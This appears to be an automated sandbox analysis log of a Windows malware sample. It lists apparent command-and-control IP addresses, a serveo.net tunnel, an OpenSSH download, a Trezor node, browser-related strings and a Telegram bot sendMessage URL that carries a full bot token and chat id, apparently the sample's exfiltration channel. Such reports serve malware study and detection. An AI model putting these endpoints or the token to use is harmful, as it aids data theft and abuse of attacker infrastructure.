                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://46.51.231.213:443
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F291000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://node.trezor.io
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/product
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
